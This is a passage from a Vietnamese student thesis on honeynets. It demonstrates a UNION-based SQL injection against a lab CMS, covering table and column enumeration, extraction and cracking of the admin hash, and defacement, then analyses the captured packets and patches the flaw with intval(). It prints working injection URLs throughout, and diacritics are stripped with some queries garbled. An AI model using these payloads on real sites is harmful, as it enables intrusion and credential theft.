Hnh 4.17 Danh sch cc table trong CSDL genu y ta ch quan tm n table genu_users v trong table ny c cha danh sch cc tn user m chng ta ang cn tm. Bc 3: Khai thc s Column trong table genu_users Tng t nh khai thc cc table trong c s d liu bc 3. Chng ta tip tc khai thc cc column c trong table genu_users va c khai thc thnh cng bc 3 trn. C th: http://192.168.1.111/genu/articles/read.php?article_id=null 1,group_concat(column_name),3,4,5 from table_name=CHAR(103,101,110,117,95,117,115,101,114,115)-Lu : CHAR(103,101,110,117,95,117,115,101,114,115) c chuyn i t dng string l genu_users Hacker s nhn c thng tin tr v chnh l s ct c trong table genu_users union select where information_schema.columns

93 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.18 Danh sch cc column trong table genu_users Danh sch cc column hacker ly c: user_id,user_level,user_name,user_password,user_email,user_viewemail,user_website,us er_location,user_occupation,user_comments,user_posts,user_votes,user_creation,user_ip, user_language,user_template,user_date_format,user_date_offset,user_lastvisit,user_key,u ser_day,user_month,user_year,user_avatar y ta ch quan tm n cc column user_id, user_name, user_password v trong cc colum ny cha ti khon admin chim quyn kim sot Website v cng l mc ch cui cng m hacker tm n. Bc 4: Khai thc thng tin username/password c trong cc column Vn tip tc khai thc v tr th 2, ta s dng truy vn concat ly thng tin v id, username, password c trong cc column user_id, user_name, user_password c khai thc bc 3. C th: http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,concat(user_id,char(58),user_name,char(58),user_password),3,4,5 from genu_user-Hacker s nhn c thng tin cui cng l id:username:password:

94 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.19 Thng tin username/password cn tm Thng tin m m hacker c c : 1:admin:ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98 Username: admin Password: ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98 Vi password c m ha chng ta c th dng cu lnh update thy i password hoc c th gii m. y chng ta th gii m bng cch truy cp vo http://www.md5decrypter.co.uk/ v kt qu nhn c:

Hnh 4.20 Password c gii m Password thu c sau khi gii m l: xuantrung Vy hacker c ti khon admin: admin/xuantrung
95 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Sau khi chim c quyn kim sot website ny, ta c th lm bt c g iu g i vi website. Thng thng cc Hacker sau khi chim c quyn kim sot website th h s thay i giao din ca website (deface), ci backdoor trn Website ln sau quay li hoc tin hnh Local Attack, tc l tn cng cc website cng c chy trn Web server ny (V hu ht ngy ngi ta thng thu Hostting t website), pht tn cc loi m c- virus qua website ny,.. y, ta s tin hnh thay i giao din website ny. V chng ta s thy s khc nhau v giao din thng qua hai hnh 4.31 v hnh 4.32 di y:

Hnh 4.21 Giao din trang web lc ban u

Hnh 4.22 Giao din trang web khi b deface


96 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Nhn xt: Nh vy, sau mt lot tin hnh cc bc d qut l hng, thc hin tim cc on m SQL nhm khai thc thng tin ca C s d liu, ta chim c quyn kim sot c website ny. Mt cu hi t ra by gi l : Ton b qu trnh chng ta thc hin tn cng website ny th c b Honeynet ghi li hay khng?. Chng ta s tm thy cu tr li cho cu hi ny phn tip theo l phn S dng Honeynet phn tch k thut tn cng ca Hacker. S dng Honeynet phn tch k thut tn cng ca Hacker Vi s h tr ca cng c Walleye chng ta thu c mi quan h gia cc d liu tn cng h thng. Hnh 4.21 m t tng quan cc lung d liu mng vo/ra h thng Honeynet.

Hnh 4.23 -Tng quan lung d liu vo/ra h thng Honeynet Hnh di y ch ra cc gi tin c thu nhn bi Honeywall v hin th trn Walleye theo mt chui trnh t cc bc tn cng.

97 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.24 - Chui cc gi tin thu nhn trn Walleye Ta s ln lt phn tch qu trnh tn cng ca hacker nh vo h thng Honeynet nh sau:
-

Phn tch gi tin th nht ta s thy ni dung gi tin cha on m (nh du trong vung), ch ra y l mt tn cng SQL-injection vo WebServer c a ch 192.168.1.111.

Hnh 4.25 - Ni dung gi tin cha m c SQL c tim vo Trn y l ta nhn thy Honeywall c c on m SQL m Hacker tim vo khai thc l hng SQL-injection m Website ny mc phi . V on m SQL m Hacker tim vo l: id=null select 1 from information_schema.tables
98 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Cu lnh c thc thi y l: http://192.168.1.111/genu/articles/read.php?article_id=null information_schema.table-Chng ta thy phn in nghing trn chnh l phn cu lnh m chng ta tim vo. y hacker ang d xem table cha thng tin v article ca website c cha bao nhiu ct v ct no c th chn SQL vo khai thc thng tin ca c s d liu. V kt qu nhn c t webserver tr v tng ng vi cu lnh ny l: select 1 from

Hnh 4.26 - Ni dung gi tin tr v tng ng vi gi tin trn Lu : Trong cc bc tn cng ca Hacker sau ny th on SQL in nghing trong cu lnh SQL trn s lun kt hp vi cc on SQL m c Hacker tim vo to thnh cu lnh SQL c thc thi. Tc l: Cu lnh SQL thc thi = select * from member where m_username = ' + vi on SQL c tim. Sau ny, trong cc bc tn cng tip theo ca Hacker, n s khng trnh by li iu ny na. Tip theo, hacker d ln lt vi select 1,2,3,4,5 vo. Cu lnh hacker dng khai thc: http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,2,3,4,5 from information_schema.tables-99 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

nh hnh di v kt qu tr

v ca webserver l 1 trang index hon chnh hin th thng tin ct 2,3,5 c th chn SQL

n Tt Nghip

Hnh 4.27 - Ni dung gi tin khi hacker thc hin thnh cng bc u.

Hnh 4.28 - Ni dung gi tin webserver tr v Sau khi hacker bit v tr ct no c th tim SQL vo, v hacker thc hin truy vn thm trng database() vo v tr ct 2 ly thng tin l tn ca c s d liu m website ang s dng. Cu lnh hacker s dng khai thc: http://192.168.1.111/genu/articles/read.php?article_id=null 1,database(),3,4,5 from information_schema.tables-union select

100 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.29 - Ni dung gi tin hacker khai thc thng tin database V kt qu webserver tr v:

Hnh 4.30- Ni dung gi tin cha thng tin l tn database Phn tch gi tin tip theo, ta li tip tc thu c c on m SQL m hacker tim vo l :
article_id=null union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=CHAR(103,101,110,117)

101 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.31 - Ni dung gi tin hacker tim vo Mc ch ca on m SQL ny l nhm tm trong database genu c bao nhiu table v lit k tn ca cc table. Xem tip ni dung ca gi tin ny ta thy thng tin c tr v t webserver c honeywall ghi li:

Hnh 4.32 - Ni dung gi tin hin th danh sch cc table trong genu Tip tc phn tch gi tin tip theo, hacker sau khi ly c tn bng cn thit l genu_users, li tip tc tim vo on m SQL khai thc thng tin cc ct c cha thng tin username v password ca admin. on m c tim vo:
article_id=null union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(103,101,110,117,95,117,115,101,114,115) 102 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.33 - Ni dung gi tin hacker tim vo khai thc cc column Mc ch ca on m ny l khai thc cc danh sch cc colum c trong table genu_users. V theo di tip gi tin ny th thy thng tin tr v ca webserver l danh sch cc column m hacker cn khai thc.

Hnh 4.34 - Ni dung gi tin cha thng tin cc colomn trong genu_users T cc thng tin ly c trong trong genu_users, hacker bit chnh xc cc column cha thng tin v ti khon admin l user_id, user_name, user_password. V theo di gi tin tip theo ta thy hacker ly thng tin ca ti khon admin bng cch tim vo on m SQL:
article_id=null union select 1,concat(user_id,char(58),user_name,char(58),user_password),3,4,5 from genu_users 103 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.35 - Ni dung gi tin cha on m hacker tim vo ly thng tin admin Theo di tip tc gi tin ny v ta thy ni dung v thng tin ca ti khon admin c webserver tr v 1:admin:ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98 c trong gi tin ny.

Hnh 4.36 - Ni dung gi tin cha thng tin ti khon admin n y th hacker d dng c th ly c password chim quyn iu khin website ri. V sau khi s hu c ti khon admin, ta tip tc theo di xem nu nh my hacker ng nhp vo website vi ti khon ca admin th honeywall c nhn bit c khng?
104 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.37 - Ni dung gi tin thng bo website b tn cng V tip tc l 1 gi tin th hin chi tit sau khi hacker t nhp c vo bn trong website.

Hnh 4.38 - Ni dung gi tin thng bo website b deface y chng ta c th nhn thy rng sau khi hacker ly c ti khon admin v t nhp vo website, v website b hacker deface bng cch thay i thng tin trn trang web, c th l li ni dung hacked!!! . V di y l kit tc m hacker li.

105 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.39 - Website ban u

Hnh 4.40 - Website b deface Honeywall khng gip chng ta ghi li ton b qu trnh tn cng website ca Hacker m cn gip nhn bit cng c Hacker s dng tn cng. Trong kch bn tn cng ny, hacker pht hin li SQL Injection bng cch thm k t c bit c th l du nhy n vo sau ng dn ca bi vit. http://192.168.1.111/genu/articles/read.php?article_id=1

106 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 4.41 - Gi tin hacker s dng kim tra li SQL Injection

Hnh 4.42 - Gi tin biu hin li SQL Injection Nh vy, nh vo Honeywall m ton b qu trnh thc hin tn cng website http://192.168.1.111/genu/ ca Hacker c Honeywall ghi li c tm tt nh sau :
-

u tin, Hacker pht hin li SQL-injection bng cch thm du nhy n vo sau ng dn, v pht hin ra c website trn mc li SQL-injection. Tip theo, Hacker s dng cc k thut tn cng SQL-injection tn cng website trn v xm nhp thnh cng, chim c quyn kim sot Website . Cui cng, Hacker thay i Website bng cch upload file nh xedap.jpg, v thay i ni dung bi vit bng cch li ch hacked!!!
107

Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Ngoi nhng iu trn ra th hacker cn c th ci t virus ln website, v bin website thnh cng c phn tn virus trn mng. Nhn xt kt qu phn tch v bin php khc phc li SQL-injection ca website b tn cng trn. H thng Honeynet thu c mt s kt qu sau: - Gip chng ta thy r qu trnh tn cng ca hacker din ra c th nh th no: cc tn cng c th din ra tng bc ra sao. Sau khi chim c quyn iu khin honeypot, hacker lm g v.v..
-

Thu c k thut tn cng ca hacker: K thut tn cng SQL-injection, thc thi web shell t xa (Remote Procedure Call RPC ), pht tn virus.

- Ngoi ra Honeynet cn c th gip chng ta bit c cng c gip hacker pht hin website b li SQL Injection m khng phi pht hin bng tay. Vi mc ch nghin cu Honeynet thu thp cc k thut tn cng dch v web. T , gip chng ta sm pht hin cc l hng bo mt, im yu ca Web chng ta sm c cc bin php khc phc, s l kp thi, m bo an ton cho Website ln ngi s dng web. Do vy, s tht l thiu st nu nh y n khng trnh by bin php khc phc li SQL-injection ca Website b tn cng trn. Di y l bin khc phc : Cn c vo thng tin thu thp c ca Honeynet, ta xc nh li SQL-injection ca Website b tn cng trn b mc file read.php trong th mc /articles. V khi thm du nhy n vo sau ng dn: http://192.168.1.111/genu/articles/read.php?article_id=1 th trnh duyt s thng bo li: Error in query "SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_articles.article_id = 1\'". iu ny chng t trnh duyt khng th loi b nhng k t c bit ra khi URL nn cu truy vn l sai. Vy nh qun tr website cn phi bin gi tr ca $id phi l s nguyn, nh vy th hacker s khng th tim m c hi SQL. M file read.php trong th mc / articles ta thy:
108 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

genu_users.user_id,

genu_users.user_name

FROM

genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND

n Tt Nghip

Hnh 4.43 - Ni dung file read.php ban u khc phc li ny, ta ch vic thm hm intval(), trong intval th int c ngha l integrals (s nguyn), cn val c ngha l value ( gi tr ) bin cc gi tr $id lun lun l mt s nguyn.

Hnh 4.44 - Ni dung file read.php sau khi sa

109 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip V y l kt qu khi hacker c gng pht hin li SQL Injection bng cch thm du nhy n.

Hnh 4.45 - Kt qu sau khi fix li SQL Injection 4. ng dng Honeynet trong thc t hin nay Hin nay trn th gii c rt nhiu t chc , c quan , c bit l cc Cng ty t chc An ninh mng tin hnh trin khai H thng Honeynet nh : Symantec, Trend Micro ,Snort ; v ngay Vit Nam ta th Trung tm an ninh mang Bkis cng trin khai H thng ny. Hin ti hot ng rt tt, c tc dng hu hiu trong vic gip cc chuyn gia an ninh mng nghin cu v sm pht hin ra cc l hng bo mt tn ti trn cc sn phm cng ngh thng tin ; Cc k thut tn cng mng mi , cc mu virus- m c mi ; gip truy tm du vt - tung tch cc tin tc ; kim tra an ton ca h thng mng v qua gp phn bo H thng mng ngn chn s xm nhp tri php ca cc tin tc.

110 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip KT LUN Trong qu trnh nghin cu thc hin n tt nghip Nghin cu H thng Honeypot v Honeyner nhm nghin cu mt s k thut tun cng dch v Web, di s hng dn tn tnh ca thy Hong S Tng, em nghin cu v nm vng c hot ng, mc ch ca H thng Honeynet. C kh nng trin khai p dng v pht trin Honeynet vo thc t. Do iu kin v thi gian v thit b trin khai cn thiu nn vic nghin cu trin khai xy dng H thng Honeynet v ng dng thc t ca Honeynet ca em ch gii hn phm vi th nghim. Mc d rt c gng nhng n ny khng trnh khi c nhng sai xt. Em rt mong c s gp , gip nhit tnh ca cc thy c v cc bn ti ny ca em c hon thin.Em xin chn thnh cm n.

111 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Di y l mt s link tham kho : http://www.tracking-hackers.com/papers/honeypots.html www.honeynet.org http://www.icst.pku.edu.cn/honeynetweb/honeyneten/HoneynetTopology.htm http://www.honeynet.org.gr/reports/apr2005-sept2005.html http://www.honeynet.org/papers/phishing/details/index.html http://www.exploit-db.com/webapps/ http://vietcloud.net/thong-tin/91/0/top-10-ky-thuat-tan-cong-tren-web.aspx

112 Hc Vin K Thut Mt M Khoa An Ton Thng Tin